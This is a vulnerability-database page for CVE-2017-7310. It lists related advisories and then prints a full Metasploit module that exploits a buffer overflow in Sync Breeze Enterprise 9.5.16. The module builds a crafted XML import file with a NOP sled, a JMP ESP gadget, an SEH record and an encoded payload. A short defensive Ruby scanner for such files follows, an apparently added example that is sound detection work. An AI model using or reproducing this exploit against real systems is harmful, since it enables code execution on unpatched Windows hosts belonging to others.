| Title | Published | Views | Reporter |
|---|---|---|---|
| Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow Exploit | 25 Jan 2018 00:00 | – | zdt |
| Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) Exploit | 21 Feb 2018 00:00 | – | zdt |
| CVE-2017-7310 | 29 Mar 2017 00:00 | – | circl |
| Buffer Overflow Vulnerability in Multiple Flexense Products | 31 Mar 2017 00:00 | – | cnvd |
| CVE-2017-7310 | 29 Mar 2017 21:00 | – | cve |
| CVE-2017-7310 | 29 Mar 2017 21:00 | – | cvelist |
| Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH) | 21 Feb 2018 00:00 | – | exploitdb |
| Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) | 21 Feb 2018 00:00 | – | exploitpack |
| Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow | 24 Jan 2018 20:47 | – | metasploit |
| Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow | 15 Jan 2018 20:46 | – | metasploit |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
      'Description'    => %q(
        This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Teixeira'
        ],
      'References'     =>
        [
          [ 'CVE', '2017-7310' ],
          [ 'EDB', '41773' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
          'StackAdjustment' => -3500
        },
      'Targets'        =>
        [
          ['Windows Universal', { 'Ret' => 0x10015FFE } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 29 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
      ])
  end

  def exploit
    jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
    jmp = "\xFF\xE0" # JMP EAX

    buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
    buffer << "\x90" * 1536
    buffer << jmpesp
    buffer << "\x90" * 18
    buffer << esp
    buffer << jmp
    buffer << "\x90" * 68
    buffer << generate_seh_record(target.ret)
    buffer << "\x90" * 10
    buffer << payload.encoded
    buffer << "\x90" * 5000
    buffer << "\n</classify>"

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)
  end
end
```
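A defensive check for the import file layout shown in the module above, added here as an example (it is not part of the Metasploit module or of any vendor tooling): it scans an XML import file byte-wise, because a crafted file need not be well-formed XML, and reports a `classify` `name` attribute that is unterminated, oversized or non-printable. `scan_import_xml`, `MAX_NAME_LEN` and both sample strings are assumptions constructed for illustration.

```ruby
# Added example: triage check for XML import files before they are opened
# in an affected product. MAX_NAME_LEN is an assumed policy limit, not a
# value published by the vendor.
MAX_NAME_LEN = 256

# Constructed samples (not real captures). The second one only mimics the
# shape of a crafted file: a long, unterminated name attribute with high bytes.
BENIGN_SAMPLE = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" \
                "<classify\nname='Default'>\n</classify>"
CRAFTED_SAMPLE = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname='" +
                  'A' * 2000).b + "\x90".b * 4 + "\n</classify>".b

# Returns an array of finding strings; an empty array means nothing was flagged.
def scan_import_xml(data)
  data = data.dup.force_encoding(Encoding::BINARY)
  findings = []
  # Find every name attribute inside a <classify ...> start tag, byte-wise.
  data.scan(/<classify\s[^>]*?name\s*=\s*(['"])/mn) do
    quote = Regexp.last_match(1)
    start = Regexp.last_match.end(0)
    close = data.index(quote, start)
    # With no closing quote, treat the rest of the file as the value.
    value = close ? data[start...close] : data[start..-1]
    findings << 'name attribute is never closed' unless close
    if value.bytesize > MAX_NAME_LEN
      findings << "name attribute is #{value.bytesize} bytes (limit #{MAX_NAME_LEN})"
    end
    if value =~ /[^\x20-\x7E]/n
      findings << 'name attribute contains non-printable bytes'
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN_SAMPLE, 'crafted' => CRAFTED_SAMPLE }.each do |label, sample|
    result = scan_import_xml(sample)
    puts "#{label}: #{result.empty? ? 'clean' : result.join('; ')}"
  end
end
```
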